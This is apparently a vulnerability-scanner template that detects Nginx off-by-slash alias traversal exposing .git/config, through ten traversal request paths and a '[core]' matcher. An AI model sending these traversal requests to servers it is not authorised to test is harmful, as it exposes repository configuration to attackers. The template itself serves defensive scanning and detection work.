id: git-config-nginxoffbyslash info: name: Nginx - Git Configuration Exposure author: organiccrap severity: medium description: Nginx is vulnerable to git configuration exposure. reference: - https://beaglesecurity.com/blog/vulnerability/nginx-off-by-slash-exposes-git-config.html - https://twitter.com/Random_Robbie/status/1262676628167110656 - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 tags: config,exposure,nginx requests: - method: GET path: - '{{BaseURL}}/static../.git/config' - '{{BaseURL}}/js../.git/config' - '{{BaseURL}}/images../.git/config' - '{{BaseURL}}/img../.git/config' - '{{BaseURL}}/css../.git/config' - '{{BaseURL}}/assets../.git/config' - '{{BaseURL}}/content../.git/config' - '{{BaseURL}}/events../.git/config' - '{{BaseURL}}/media../.git/config' - '{{BaseURL}}/lib../.git/config' stop-at-first-match: true matchers: - type: word words: - '[core]' # Enhanced by mp on 2022/07/26